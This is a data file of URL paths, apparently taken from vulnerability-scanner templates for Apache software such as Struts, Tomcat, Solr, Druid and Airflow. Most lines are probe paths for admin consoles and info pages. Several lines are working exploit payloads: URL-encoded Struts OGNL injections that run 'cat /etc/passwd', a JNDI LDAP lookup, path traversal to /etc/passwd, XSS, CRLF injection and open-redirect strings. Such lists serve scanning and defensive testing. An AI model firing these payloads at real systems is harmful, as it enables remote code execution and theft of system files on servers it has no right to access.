/user.action
/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D
/integration/saveGangster.action
/?id={{str}}%25{128*128}
/{{interface}}
/context.json
/api/experimental/latest_runs
/?id=%25%7B%28%23instancemanager%3D%23application%5B%22org.apache.tomcat.InstanceManager%22%5D%29.%28%23stack%3D%23attr%5B%22com.opensymphony.xwork2.util.ValueStack.ValueStack%22%5D%29.%28%23bean%3D%23instancemanager.newInstance%28%22org.apache.commons.collections.BeanMap%22%29%29.%28%23bean.setBean%28%23stack%29%29.%28%23context%3D%23bean.get%28%22context%22%29%29.%28%23bean.setBean%28%23context%29%29.%28%23macc%3D%23bean.get%28%22memberAccess%22%29%29.%28%23bean.setBean%28%23macc%29%29.%28%23emptyset%3D%23instancemanager.newInstance%28%22java.util.HashSet%22%29%29.%28%23bean.put%28%22excludedClasses%22%2C%23emptyset%29%29.%28%23bean.put%28%22excludedPackageNames%22%2C%23emptyset%29%29.%28%23arglist%3D%23instancemanager.newInstance%28%22java.util.ArrayList%22%29%29.%28%23arglist.add%28%22cat+%2Fetc%2Fpasswd%22%29%29.%28%23execute%3D%23instancemanager.newInstance%28%22freemarker.template.utility.Execute%22%29%29.%28%23execute.exec%28%23arglist%29%29%7D
/?unix:{{repeat(
/plugin
/streampipes-backend/api/v2/auth/settings
/streampipes-backend/api/openapi.json
/ws/v1/cluster/apps/new-application
/druid/coordinator/v1/lookups/config/$%7bjndi:ldap:%2f%2f{{interactsh-url}}%2ftea%7d
/nifi-api/process-groups/root
/poc.jsp/
/poc.jsp?cmd=cat+%2Fetc%2Fpasswd
/struts2-rest-showcase/orders/3
/orders/3
/jkstatus
/jkstatus;
/%24%7B%28%23_memberAccess%5B%27allowStaticMethodAccess%27%5D%3Dtrue%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28@org.apache.struts2.ServletActionContext@getResponse%28%29.getOutputStream%28%29%29%29.%28@org.apache.commons.io.IOUtils@copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D/help.action
/%24%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action
/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action
/meta
/v2/api/product/manger/getInfo
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
/graphql
/index.jsp
/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command
/code?dag_id=example_passing_params_via_test_command
/?doAs=`{{url_encode(
/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}
/%5C%5C{{interactsh-url}}/apachehttpd
/{{files}}
/{{http_1_files}}%3ftest.php
/html/usr/share/doc/hostname/copyright%3f
/unified-console.html
/console/auth/login

/admin/
/_config
/nifi-api/access/config
/api/security/ticket
/demo/
/login/
/admin/airflow/login
/user/login?redirect=%2F
/console/index.html
:5050
/mcm
/cluster-manager
/mod_cluster_manager
/manager/html
/host-manager/html
/_all_dbs
/druid/login.html
/dfshealth.html
/info
/#/admin/dashboard
/#/login?redirect=%2F
/#/login
/solr/
/login
/manager/status
/docs/
/examples/
/conf
/axis2/axis2-web/HappyAxis.jsp
/axis/happyaxis.jsp
/axis2-web/HappyAxis.jsp
/happyaxis.jsp
/..;/manager/html
/..;/..;/manager/html;/
/..;/host-manager/html
/..;/..;/host-manager/html;/
/{{randstr}}/..;/manager/html
/{{randstr}}/..;/host-manager/html
/examples/servlets/index.html
/examples/jsp/index.html
/examples/websocket/index.xhtml
/examples/servlets/servlet/SessionExample
/..;/examples/servlets/index.html
/..;/examples/jsp/index.html
/..;/examples/websocket/index.xhtml
/..;/examples/servlets/servlet/SessionExample
/examples/jsp/snp/snoop.jsp
/{{randstr}}
/console/hawtconfig.json
/neighborhood
/answer/api/v1/siteinfo
/axis2/
/axis/
/ui/metalakes
/translations/en.json
/assets/app-data.json
/system/console
/ui/
/static/
/
/assets/img/favicon/favicon.ico
/login.jsp
/images/favicon.ico
/docs/introduction.html
/dashboard/
/access/config
/controller/config
/controller/registry-clients
/counters
/flow/registries
/system-diagnostics
/lighter/api
/cluster/cluster
/Wiki.jsp?page=SystemInfo
/.licenserc.yaml
/index
/server-status
/server-info
/struts2-showcase/showcase.action
/examples/servlets/servlet/CookieExample
/?f=\[
/examples/jsp/snp/snoop.jsp;<script>alert(document.domain)</script>test.jsp
/login.action
/lui/
/hub/
/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))
/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}
/index.action?redirect:http://www.interact.sh/
/~user/%0D%0ASet-Cookie:crlfinjection
//interact.sh
/admin/queues.jsp?QueueFilter=yu1ey%22%3e%3cscript%3ealert(%221%22)%3c%2fscript%3eqb68
/printenv.shtml?{{url_encode(payload)}}
/ssi/printenv.shtml?{{url_encode(payload)}}
/%5cgoogle.com/evil.html
/http%3A%2F%2Fwww.interact.sh
/kylin/api/admin/config
/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(/xss/)%3E
/solr/admin/metrics
/airflow.cfg
/apache.conf
/engine-ui/0.0.0.0:4040/environment/
/appconfigs
/perl-status
/api/v1/cluster/summary
/api/v1/applications
/environment/
/jobs/
:4040/jobs/
/signup
/ui/clusters/kafka-ui/brokers
/struts/webconsole.html?debug=console
